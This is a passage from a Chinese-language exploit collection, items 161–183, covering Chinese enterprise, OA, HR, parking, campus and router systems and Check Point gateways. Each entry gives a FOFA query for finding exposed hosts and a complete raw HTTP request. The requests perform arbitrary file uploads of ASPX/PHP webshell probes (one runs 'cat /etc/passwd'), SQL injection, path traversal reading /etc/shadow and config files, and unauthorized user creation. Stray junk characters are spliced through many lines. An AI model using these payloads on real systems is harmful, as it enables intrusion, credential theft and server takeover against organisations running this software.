) ?+ w& q& A. v9 J4 U( B+ qConnection: close
( Y/ Y* H" ]- p3 N) u7 W7 X" P: bAccept: */*
; }' u% j* ^/ \- e+ y0 pAccept-Language: en4 P8 l5 U/ ?9 R& y
Accept-Encoding: gzip5 l" e- G5 Q  t
( [, G9 n( Y, Z( O+ N' b

: F% u$ V% r  u; j; A* D' c161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传6 E4 E$ W: P& b: L# x
FOFA:body="/KT_Css/qd_defaul.css"
7 h# k* f1 _& f第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
5 B& o) }3 P) d/ d3 e3 XPOST /Webservice.asmx HTTP/1.14 o) c+ j) z" d: L5 e# o
Host: x.x.x.x
1 y  t2 E/ t% D' @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ e. D0 q+ L5 E" v5 e# q) vConnection: close1 U& p; V- h* |. p5 t9 z
Content-Length: 4454 M5 ~0 r# Y; [, K
Content-Type: text/xml8 ?+ ^4 Q( _* ~. L
Accept-Encoding: gzip
' v+ c+ U( ~- o2 v5 t4 A. l# ]/ a" c5 f
<?xml version="1.0" encoding="utf-8"?>
5 T, N$ M* v: e8 C2 j$ k/ f<soap:Envelope xmlns:xsi="
+ \+ ]# q% L( {# E# c0 b5 yhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"" J1 k# O) P2 }
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  n' B  [! y. X* i0 H+ o' M<soap:Body>
  {4 Y! a) a# C. i<UploadResume xmlns="http://tempuri.org/"># D8 m" P( Z4 m5 Z! y
<ip>1</ip>) a/ H) K4 a0 o& C% K
<fileName>../../../../dizxdell.aspx</fileName>  r; W% A0 w0 h! r+ D
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
# C1 M  m+ y5 x7 Z( S# z<tag>3</tag>& t; A8 I8 [2 b4 H2 ~! e
</UploadResume>8 M! I" c4 \6 f& M' N% A7 q( a5 h
</soap:Body>
0 d! b3 |! S; `  G( p# [4 }5 P* m8 k</soap:Envelope>8 L6 V; u& W- `# Z( r$ j$ Z( \9 G
5 ^+ U4 E' l+ l$ `  H/ p
/ e: D  d  F4 S
http://x.x.x.x/dizxdell.aspx; U& G1 J$ o: e. W

* [4 l  K7 A; A& V$ F8 @. l7 |% C9 N8 t162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
) d, T, P- l. d: e" jFOFA: app="和丰山海-数字标牌"
3 K  z; i4 m1 K0 r7 \1 HPOST /QH.aspx HTTP/1.1
2 @8 f) q$ c. o  |) JHost: x.x.x.x7 N. b  G' a9 }/ ?/ _! J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.04 B0 m# U9 ~5 y1 ]/ ^
Connection: close
- D9 s6 r' \/ l5 Q' ?8 x3 UContent-Length: 583
2 D. U! s+ D/ S7 a$ AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey/ q  _3 G! y, ~' I) R) R( J# `
Accept-Encoding: gzip
7 J- Z, S3 Y2 E  v8 Q# u4 i2 p: w
------WebKitFormBoundaryeegvclmyurlotuey/ v+ W4 w. O+ j' J
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
& I3 w" D# _0 A! O5 T  E0 B& hContent-Type: application/octet-stream" m% U9 m1 `0 k! D! [% c& {8 H
2 d) l& m8 \7 F# p; O
<% response.write("ujidwqfuuqjalgkvrpqy") %>
* C4 m6 K% I# \/ p------WebKitFormBoundaryeegvclmyurlotuey$ W/ t) c0 S7 c. l; [+ \; W4 Y
Content-Disposition: form-data; name="action": \7 _$ H( V, Z$ E6 l9 l) r0 l& g. R
' ?' c' n. x# u, s' ]9 U
upload: Q& O$ k) V. m* T
------WebKitFormBoundaryeegvclmyurlotuey
' d+ |, d$ k0 g6 `Content-Disposition: form-data; name="responderId"
; B( }' V1 f  A& _- S, u7 V9 ^. D+ z( E9 w% v. ~
ResourceNewResponder- m. P& N$ G" U
------WebKitFormBoundaryeegvclmyurlotuey
% E+ i5 A" c9 z- x& K0 hContent-Disposition: form-data; name="remotePath"
0 q' ~5 \1 }* [1 D# z0 |% R& F- C9 Y
/opt/resources* _7 K0 h" b1 Y' q1 J/ D
------WebKitFormBoundaryeegvclmyurlotuey--( u- [& y; H! E; e3 A( G
6 A& ~' W1 g1 n$ v+ P

" a# u0 X- y: t2 }' _http://x.x.x.x/opt/resources/kjuhitjgk.aspx
! L1 o' {8 k* [5 M9 O" J
% N; `5 Q8 E+ o7 k# F163. 号卡极团分销管理系统 ue_serve.php 任意文件上传$ y0 l6 N; M8 I0 O/ V3 S7 o) ]
FOFA: icon_hash="-795291075"" y6 L2 t9 C# O5 b$ Z; w
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1  j- G) L* `9 Q0 K3 H
Host: x.x.x.x+ c6 q& \- N" f! y- d- p& p7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
  d0 a7 _; h0 y$ D- t6 S! C9 VConnection: close
2 P6 @. c, S5 F+ U" ZContent-Length: 2933 d& V) Z2 ~* Z# d
Accept: */*
# m6 L! B: W. k/ M! S5 e4 p1 cAccept-Encoding: gzip, deflate5 n4 e7 R6 w8 B5 s( k
Accept-Language: zh-CN,zh;q=0.97 a, i% p# I: ]' a* P8 {
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod0 z1 n2 g5 z) L

. @2 |+ z, e' V$ M' n/ A& N------iiqvnofupvhdyrcoqyuujyetjvqgocod3 R% C$ b' j+ h$ n5 z" p' W' ]; L
Content-Disposition: form-data; name="name"5 d+ F3 h" R, C+ ^
# i8 a# M" e# L. F  M+ M& W
1.php# M" @' S  R: W+ W1 U" \
------iiqvnofupvhdyrcoqyuujyetjvqgocod4 A3 ~, D8 `% s6 H
Content-Disposition: form-data; name="upfile"; filename="1.php"
! t1 q1 i' w7 j" {/ nContent-Type: image/jpeg
: S8 \2 U0 L' n, h3 S
- N+ f3 y- V: q: W3 H1 Krvjhvbhwwuooyiioxega
* M9 |+ O- f4 [------iiqvnofupvhdyrcoqyuujyetjvqgocod--
0 E7 N( U1 f1 O# @
! D$ x7 _9 f0 ?) B# c" ^: K
% F) f# B! r0 A+ ?! N0 w% K164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
! g% B/ F/ D3 B  ?# QFOFA: title="智慧综合管理平台登入"6 d0 f1 _6 t3 [" c
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
# A% \/ Y* Z% m- R6 L: {  {Host: x.x.x.x
* Z' l  m1 n% c) @1 A, B' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0  V; B& H, w" E. Q) [
Content-Length: 2881 b. ?' l$ n# q# k  a4 g* u
Accept: application/json, text/javascript, */*; q=0.01
0 H, Z* ]9 C+ K3 q7 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,7 X) E; ~2 V  e2 t
Connection: close" I; y. n( f$ U% o  D) u
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl& j6 Z9 Y' ~8 E* h
X-Requested-With: XMLHttpRequest
3 c6 Q. V* g% u$ J# ]Accept-Encoding: gzip) Q6 H) a& e3 _; u9 M& F5 Q7 T

; [+ g6 N% H9 l' \4 S3 R) x+ N------dqdaieopnozbkapjacdbdthlvtlyl
9 M- j( K1 `6 u8 bContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx": G! E9 }7 r; N7 y( t* r
Content-Type: image/jpeg/ O/ Q1 G5 C* _' [7 S" z

) C5 H# M2 B1 h4 U+ T4 m5 j<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>& A1 Q5 i6 f- {  D) ~
------dqdaieopnozbkapjacdbdthlvtlyl--
1 a3 _! K( C8 h& ^7 a2 ^5 z$ E$ L3 o% r# I
6 [0 ]& W, C: w8 z2 q$ z4 k, x6 r6 p
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx/ z7 m" ]5 b7 ~8 h' K. C

" K: L- J* }! r5 x9 F6 F165. OrangeHRM 3.3.3 SQL 注入+ P9 N$ F5 X' ?1 c5 h4 x- c8 |
CVE-2024-36428
) b' P% S# {. Z& U5 I& P8 v: t3 |FOFA: app="OrangeHRM-产品"
# u! f/ F/ B. PURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
; t  G- X4 {2 a( F, A0 {5 s" J+ T0 \

6 t( U, v/ }! }1 `  x* q- d- O166. 中成科信票务管理平台SeatMapHandler SQL注入0 ^4 x( I% y2 {0 e- n
FOFA:body="技术支持:北京中成科信科技发展有限公司"% E# ^0 c$ W3 Z% w- n* K! W
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.12 m/ l% P; {8 D, x1 ~  \; k9 c  z
Host:
- |+ y% h  m3 \8 w; h7 J1 P+ ~Pragma: no-cache
8 I) q5 {  @" l( nCache-Control: no-cache
' ?8 t8 M$ E1 @Upgrade-Insecure-Requests: 1
5 M: v9 ?* J) ]. y; TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.361 }! b7 H1 U9 z) r; X# O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) L. F+ [6 D% c3 O
Accept-Encoding: gzip, deflate8 [6 K9 @! s0 o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8( Y# H5 U5 r% M$ b+ O- b' G
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE0 U. X% Q; I* @1 W- ?
Connection: close
$ T8 k% y- l9 Z6 z) TContent-Type: application/x-www-form-urlencoded
3 Z: r* H8 q5 h8 K2 _& ?3 TContent-Length: 89  {2 d$ \0 p$ f

; \7 F' O1 g- \& @9 t2 X1 Z5 sMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
8 S  }& H/ D$ q+ V$ C/ R' o) W' g9 t: H1 Q* r! z, t

' T0 [, X* G3 W167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ m+ ?# Y# X& yFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
9 U0 ~. a' o" v+ P. X. V4 w! L: fGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1' N3 ]# q3 ?4 t
Host:
5 F; W9 h( }3 P3 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  `. n& Z2 @3 ?: wContent-Type: application/x-www-form-urlencoded5 a" Q: R7 V) j+ `* q
Accept-Encoding: gzip, deflate( J# z8 K9 e1 j! |. s9 `% x
Accept: */*0 d  b: p% K2 n
Connection: keep-alive# J9 U5 o" G7 \9 q' u8 f
! ?( U- ^! H" e% T$ s# Z. p
+ @4 b- e3 l, ~7 l: V
168. 宏景EHR OutputCode 任意文件读取0 G! N* m2 N! S& F2 A4 w
FOFA:app="HJSOFT-HCM"& W2 [0 c* C! I. v! E
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
% O5 x' _8 h; G  U& l/ m7 PHost: your-ip
7 Z  T+ s8 R2 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
5 m: Z- N* a  ]7 _& G- w6 JContent-Type: application/x-www-form-urlencoded
& F& o$ m% P+ O2 w4 ^Connection: close
+ K4 R5 @  w# \2 a! a/ I  K) G* z1 D3 n
% z8 ]/ A, @/ _9 h8 v2 e2 I2 m
2 P/ n7 v- ?, K: h; R
169. 宏景EHR downlawbase SQL注入
9 Q) X! Z: v" t6 jFOFA:app="HJSOFT-HCM"& q' x) [& P$ D" H2 }, S6 a- I! r4 w+ P
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
7 N4 F( J, n# o2 ~Host: your-ip
1 ]  {( H( i; W: K; F, FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! v- H! w( O( [9 MAccept: */*
: x% l8 Q# W. \; W$ I7 XAccept-Encoding: gzip, deflate
/ D& P) U$ J+ ]3 T' I* l' Y6 `0 \Connection: close. T( r7 G) R. G: B0 W
/ V, q' E  ~9 T  W2 ~$ f

5 U6 ^* t+ C: \% i6 ^6 s# g( `0 ^  ?
170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 D7 R# `& e) U" h5 E
FOFA:body="/general/sys/hjaxmanage.js"5 a. @" {5 J, |4 B0 V
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
2 y1 y: P1 j( n  Z) eHost: balalanengliang
0 C; \3 v' n# S6 A! g# \User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 s. ~* D  ?3 S# AContent-Type: application/x-www-form-urlencoded' a0 J+ x; ^8 A1 D. _. P2 P9 Q

3 D+ \# K' d  Ofilename=../webapps/ROOT/WEB-INF/web.xml
1 v% h& i5 |' Z2 x
" R" c- m6 Z, s! ]$ Y/ z; a. W+ n( r
171. 通天星CMSV6车载定位监控平台 SQL注入
. e% U+ d! ]. n0 `! e2 n8 [FOFA:body="/808gps/"+ J$ s* k9 {( s% d" K' U% U
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.18 `9 P% c2 J7 s# \4 k
Host: your-ip! u, K; ^5 k  c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0, @) V9 Z& I% K. t! }
Accept: */*
3 _  D4 T9 t0 K) ?( lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% e; c( j' G/ N5 y' I9 SAccept-Encoding: gzip, deflate) A& k6 s4 y0 f  N8 G' S5 A
Connection: close
) t! q- r% Q- @! W  B, C4 k  w0 s: T) Q1 x- K4 \9 f
- K) ], d" I4 y$ y( t1 M
, k3 G" L5 M6 p' f3 t
172. DT-高清车牌识别摄像机任意文件读取# y- z0 v+ S% e+ F* e% x: u$ g
FOFA:app="DT-高清车牌识别摄像机"" O6 A9 q2 J, R5 E
GET /../../../../etc/passwd HTTP/1.1
* b1 q# u; P! {/ v+ o$ EHost: your-ip& Y1 i. P. a. ^, `2 r' G* X5 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- [( R6 G* F6 x3 A9 S
Accept-Encoding: gzip, deflate) _+ J. n. K5 i/ G8 ^9 F' @. u* p% w
Accept: */*
" `! A+ V* H. JConnection: keep-alive# r  @8 _3 f6 M) Y# D) O5 x

6 v4 T7 V4 l' e' W: n! g8 c
$ r& N2 G7 b0 v% j5 W. K  S$ J+ j7 m
173. Check Point 安全网关任意文件读取
# `* n9 H$ D) t" V' uCVE-2024-24919( R$ S. c& A+ N/ B# K
FOFA:app="Check_Point-SSL-Network-Extender"0 h: d7 z6 O: V# Z8 w& A* p. D
POST /clients/MyCRL HTTP/1.1. N! U. B, v1 m) D& u6 l3 {4 H
Host: your-ip
+ N3 W3 |5 H/ j  W& @0 \Content-Type: application/x-www-form-urlencoded! v" T8 B! M+ {0 n3 d" b2 B; Y
. e2 m) s) w! q7 e2 D  E4 ~. N
aCSHELL/../../../../../../../etc/shadow! w, i/ ^( J) l2 f- c

" ]( ?4 L! X, W* v  X% N' Z" ]% t
: J1 G3 ~7 w# S  F' l2 P( N
+ i3 f0 F  p7 i4 @' N7 M174. 金和OA C6 FileDownLoad.aspx 任意文件读取
# |  X( r5 z' s' w8 _) S3 tFOFA:app="金和网络-金和OA"
* [; r4 n" O1 D$ z$ ^' `GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1, x8 ^, V; Z! o: f
Host: your-ip) h% }5 _3 |7 m  f% \4 C7 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- y" o" ~! v) u$ v$ r3 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- K2 @- U1 O' ~- p% @$ tAccept-Encoding: gzip, deflate, br
7 I. I  t$ a0 }( a5 c# j) }8 MAccept-Language: zh-CN,zh;q=0.9( k" S/ R2 o; n, M
Connection: close
! O0 W7 I$ s* L2 ~8 U! L
; N) ~1 M1 ]2 {8 O3 }' s
% ^6 L- d) ?: Y2 M2 o! n& j' j7 N
' I+ V1 ^3 @& [1 {  ]175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 F6 z4 K) z8 `. [4 z; _- U- tFOFA:app="金和网络-金和OA": Q% p& J; ]- {, v- M! J
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
8 \5 i2 g8 @: z8 u( I$ [% P3 l& SHost:
# N! ~: y9 B" [; IUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) {8 V6 g+ A3 R& m+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 T( f) k7 [& i  b9 [) h* c' Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. _! P2 S! h0 H6 X) m" K8 FAccept-Encoding: gzip, deflate
( }6 o2 h1 }7 D, @Connection: close8 `# N4 N$ F* r  Q3 D
Upgrade-Insecure-Requests: 1
, r/ f0 A+ k% J6 i1 k: K; }4 x8 f3 g# P) S; }

2 G) z: ~( Q  Q; T- b176. 电信网关配置管理系统 rewrite.php 文件上传* q, Q; P/ l0 ^+ x9 a1 |  T
FOFA:body="img/login_bg3.png" && body="系统登录"
' j7 F$ g8 R! @7 `9 n$ jPOST /manager/teletext/material/rewrite.php HTTP/1.1
/ ~9 N( D- ^+ v1 R5 N' N* H3 hHost: your-ip0 R: h; c' [" w4 V3 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
" A( i, D( `6 ]+ sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
. Z: g3 E  V& X! c# {5 M( ?Connection: close; Z% t/ N( X% Q  B" d

4 }  X% ~5 J* Q* L- V------WebKitFormBoundaryOKldnDPT
8 D  f( {6 W, E, e: n+ g+ }Content-Disposition: form-data; name="tmp_name"; filename="test.php", f. G& m: ~% ^$ d
Content-Type: image/png
" e9 y! U! J2 U; ^
" n1 d2 b  _' s+ J" j<?php system("cat /etc/passwd");unlink(__FILE__);?>1 \( }! d, s4 U- [( \
------WebKitFormBoundaryOKldnDPT
# l- g2 k7 n9 t3 S- J5 CContent-Disposition: form-data; name="uploadtime"
: r. Y1 u  u1 t  l 5 S4 u' I! S) [0 P! f" `- Q1 \

5 O' X  Z6 P0 `( ]6 b3 A$ B------WebKitFormBoundaryOKldnDPT--
7 S7 e' I3 F! F
8 o+ A$ \7 W5 F8 N& b
  b3 ~8 T) b2 N6 S6 u! ~: q9 ]  k
7 T7 @5 }" B- I+ [3 u3 \177. H3C路由器敏感信息泄露
, W" o, q/ _$ }7 G/ ]/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
* d+ I! B  C. |% b/userLogin.asp/../actionpolicy_status/../M60.cfg' z' M2 B( G% }/ U4 ?) K: f$ \
/userLogin.asp/../actionpolicy_status/../GR8300.cfg. r5 L' l5 d1 W7 A
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
) C0 I* s( r3 N/ H$ m5 ]3 k/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 s* k! d7 f9 B/userLogin.asp/../actionpolicy_status/../GR2200.cfg& B# Z" S, @- j5 U( }% L
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
4 U# Y/ E' H, j* g: h/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
* c3 _  L& a5 p& C5 o" M7 Z$ C/ l& |) s/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg% [! q2 u8 ^& ?8 {8 r" O: x
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
4 z; B0 e+ B9 S6 H/userLogin.asp/../actionpolicy_status/../ER5200.cfg' g; x! Z8 Q0 z3 v
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
. F/ J( x8 W9 `: P9 f- O) H6 i/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg/ e3 d& n" W% Y( q# L
/userLogin.asp/../actionpolicy_status/../ER3260.cfg. R$ m" X8 \$ t8 F4 i2 b7 X) Z
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
% m! S4 A  g) p% [9 T/userLogin.asp/../actionpolicy_status/../ER3200.cfg
' x) \2 e' u* O3 M) r- p4 g) X/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg, T( G4 E# I: ~( X+ a
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
( b- j+ c  Z) V( m3 f/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg  w! d  ^4 D! U: n# p& X
/userLogin.asp/../actionpolicy_status/../ER3100.cfg0 t1 e: [* t# i, S% b2 A
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
* h  }: ]& h" r7 p
, X! {. ~9 l" |0 W5 \& [/ H
/ o' u# w9 ~% Y  _- V3 g3 ]  H  E178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 I( g( \& k7 x- Y5 v# Q% f
FOFA:header="/selfservice". l3 c. M: w! {" t  L# g
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ y- V. I  p$ j4 p: t
Host:' ^9 i8 {6 j. Y, [( R0 j3 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% V/ M/ G6 a; @! V
Content-Length: 252, @8 ?( J- t1 V# i9 u. Z
Accept-Encoding: gzip, deflate" ?. Z: \& W+ b* z2 s: b3 S
Connection: close
! k. U7 W% Q. ]" O* CContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l, P& y- h! ~/ x2 B8 I" p
-----------------aqutkea7vvanpqy3rh2l: ?/ R% ^0 z1 n  f- q- s( I; ^
Content-Disposition: form-data; name="12234.txt"; filename="12234"
1 m4 p- i) v9 r  V: IContent-Type: application/octet-stream) f+ v$ l* e6 y: s
Content-Length: 255: w: D) u4 Q1 N; E" B
; I5 @$ p2 i' A
12234. B3 z  P& T& }% L1 h/ l3 N
-----------------aqutkea7vvanpqy3rh2l--8 H- R1 L# E" f% Z1 R

. x3 m2 U' e8 ~9 @/ S
, s! @+ P% a/ X; g, t. ~0 D7 v, aGET /imc/primepush/%2e%2e/flex/12234.txt9 ]3 l! L8 {, c
4 r% i* ?1 k" H3 {) d' v

2 d6 Q4 c9 s0 M9 R# [) r179. 建文工程管理系统存在任意文件读取7 S# I' ~6 Y- t& o0 l7 P
POST /Common/DownLoad2.aspx HTTP/1.1& ]- Y! b3 q# C5 O6 {
Host: {{Hostname}}
& ?4 t' o# l( jContent-Type: application/x-www-form-urlencoded9 z, c9 G- Y; {/ ]8 |- h- T% e
User-Agent: Mozilla/5.0
; u5 M  W9 `" F1 p
/ N* |( c7 C3 b& b" npath=../log4net.config&Name=
7 D- }& u% v; X, \. h
' d: r* S" }% p. f+ ~" z: ~" E, |# k: r) n# ?' Q
180. 帮管客 CRM jiliyu SQL注入
& N' O) U2 S+ z  L0 |+ e) MFOFA:app="帮管客-CRM"
# ^. c0 x+ ]+ |& XGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
$ |5 d. A( p: Z" q$ tHost: your-ip
) y, F! l2 ?0 k1 T: ~4 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, P; e* U! B5 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 E) y4 N* o) HAccept-Encoding: gzip, deflate
# h7 Y4 D9 N+ U+ F9 fAccept-Language: zh-CN,zh;q=0.95 K/ m. o3 h1 R8 F7 {- t
Connection: close' E6 j# g, k$ u# b

8 Y& T5 o$ q8 e9 B. X
$ a; m- W4 R5 [7 p181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入' |: x6 G) m* W, v3 ^2 o0 X+ i! G2 o
FOFA:"PDCA/js/_publicCom.js"$ j  f8 D4 u/ Y
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
7 Y" ?) z' {9 n8 ^* l+ u, {Host: your-ip; ^) {  X) j( Y3 S2 J" E) g% Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 V9 z1 B3 ]( q2 e4 W$ j  [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* D/ z4 @$ U5 Y' v+ y% O3 R( |Accept-Encoding: gzip, deflate, br2 U0 u/ z; Y4 d# {/ S& ^. ^' Q" j; F
Accept-Language: zh-CN,zh;q=0.9& A7 t$ T! V; l* \
Connection: close
9 {4 @! M0 u7 N  {  u$ |/ p# iContent-Type: application/x-www-form-urlencoded% O, u. h& d& c2 q1 `; K* ^

2 G( ~4 z, p: K% K4 g
, S& x: _+ A3 l0 |, Y4 U- zaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20/ V  v2 k. M% a  l7 M
3 v1 e& Q: p# ]  [
! E! g0 a$ j( e
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
7 l3 A; `, ~6 [" k9 h3 JFOFA:"PDCA/js/_publicCom.js"2 _4 u# a5 J3 Q3 F0 ?2 o2 f
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
% g) p7 U1 ]6 w; d/ Z4 v- X2 m+ aHost: your-ip
+ V- `8 S+ {0 L, L' s9 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- ^" v: a+ C9 U; ~% x! x" oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 h, Q: E4 |' R- g# jAccept-Encoding: gzip, deflate, br$ @7 a: W1 c$ R) m% W
Accept-Language: zh-CN,zh;q=0.9
+ C  T( e. z0 M; SConnection: close
+ R6 L/ C1 |, a& T5 h8 M, PContent-Type: application/x-www-form-urlencoded2 y; G1 L" f+ X6 z% T

; R  [, q% w" d4 H3 B+ Y9 S& R" Q; r0 j0 h
username=test1234&pwd=test1234&savedays=1
+ z. b; R6 Y, ?! R6 N# M
4 ~8 X2 G" a- r9 N1 m0 X0 a( Y# {
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
  G6 u: O, T7 |. n$ j7 ^FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"  @8 V' U+ @& l0 q3 n* p) B  Z  [+ x
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
; ~4 L. k9 V! k- c( r# d) I) M0 s$ wHost: your-ip& u3 n2 a5 n+ u
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
